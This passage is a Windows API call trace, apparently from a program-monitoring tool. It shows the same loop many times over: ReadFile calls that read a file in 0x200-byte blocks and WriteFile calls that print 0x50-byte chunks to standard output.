lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.155] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.155] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType 
(hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.155] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.156] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.156] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, 
lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.157] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.158] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: 
hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.159] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.159] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 
[0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.160] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, 
lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.162] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 
0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.163] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) 
returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle 
